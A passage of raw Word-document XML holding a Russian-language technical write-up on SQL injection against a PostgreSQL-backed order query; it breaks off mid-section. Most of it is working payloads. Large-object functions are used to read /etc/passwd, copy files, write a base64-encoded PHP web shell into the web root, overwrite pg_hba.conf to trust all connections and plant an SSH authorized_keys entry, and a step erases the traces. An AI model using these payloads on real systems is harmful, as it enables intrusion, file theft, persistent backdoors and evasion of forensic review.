        <w:t>Шаг 1 — Payload (подставляется вместо `status`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08772104" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, lo_import('/etc/passwd')::numeric, '' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A5983" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2288E63C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, total, status FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F557FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, lo_import('/etc/passwd')::numeric, '' --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DC76C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>total</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP-ответа атакующий получает OID нового LO — например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>16384</w:t>
      </w:r>
      <w:r>
        <w:t>. Этот OID идёт в шаг 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181868C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 2 — Payload (подставляется вместо `status`, с OID из шага 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B778AF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, 0::numeric, encode(lo_get(16384), 'escape') --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341AA07D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B99F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, total, status FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129ED900" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, 0::numeric, encode(lo_get(16384), 'escape') --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F78C12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — содержимое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Опциональная очистка следов: третий запрос с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT lo_unlink(16384)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — удаляет LO из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_largeobject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + соответствующую запись из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_largeobject_metadata</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC57BC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — вложенный подзапрос (one-shot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2AA191" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обычные SQL-функции, выполняются в одном expression-context. OID, возвращаемый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, передаётся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без промежуточного состояния в клиенте. Эффективнее для blind/automated сценариев (SQLMap, скрипты). Цена — LO остаётся в каталоге как артефакт (см. «Легитимность»).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A84FF75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `status`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4905CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, 0::numeric, encode(lo_get(lo_import('/etc/passwd')), 'escape') --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7011DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456A3250" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, total, status FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1618F79D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, 0::numeric, encode(lo_get(lo_import('/etc/passwd')), 'escape') --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DFFFA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — содержимое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> одним запросом. OID не виден наружу — что закрывает возможность сделать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_unlink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для cleanup нужно знать OID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5E82CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — file-write через lo_export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CCDEF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Две техники в одном Payload-разделе: (a) копирование существующего файла через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export(lo_import(...), dst)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — простейший случай, переносит файл откуда есть read-доступ туда где есть write; (b) запись произвольного контента через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_from_bytea(0, decode('&lt;base64&gt;', 'base64'))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для web-shell, конфигов, ключей. Все варианты — в одном UNION-выражении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C92AA88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload — вариант (a), копирование `/etc/passwd` → `/tmp/copy`:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A50676" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, lo_export(lo_import('/etc/passwd'), '/tmp/copy')::numeric, '' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F5BBA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload — вариант (b), запись web-shell в `/var/www/html/shell.php`:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782CC6E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, lo_export(lo_from_bytea(0, decode('PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==', 'base64')), '/var/www/html/shell.php')::numeric, '' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D6EEC5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит (вариант b):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1892E298" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, total, status FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560BB1B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, lo_export(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ACB04A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    lo_from_bytea(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F3CA52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A5718B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        decode('PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==', 'base64')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D01E5D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDA7ABD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    '/var/www/html/shell.php'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A36926" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)::numeric, '' --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C058B08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>decode('PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==', 'base64')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → байты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;?php system($_GET['c']); ?&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_from_bytea(0, data)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> создаёт новый LO с auto-assigned OID, наполняет его этими байтами, возвращает OID. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export(oid, path)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> записывает содержимое в файл. Атакующий обращается к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://victim/shell.php?c=id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и получает RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB37C88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Для двух других целей (см. «Что произойдёт» write-блок) — структура та же, меняется только base64-контент и путь:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBD6A4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trust: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode('bG9jYWwgYWxsIGFsbCB0cnVzdApob3N0IGFsbCBhbGwgMC4wLjAuMC8wIHRydXN0Cg==', 'base64')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/postgresql/16/main/pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, далее отдельный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_reload_conf()</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A4511D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode('c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBQS4uLg==', 'base64')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/var/lib/postgresql/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC8750A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Две группы эффектов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373EE09E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read-векторы (Payload A/B)</w:t>
      </w:r>
      <w:r>
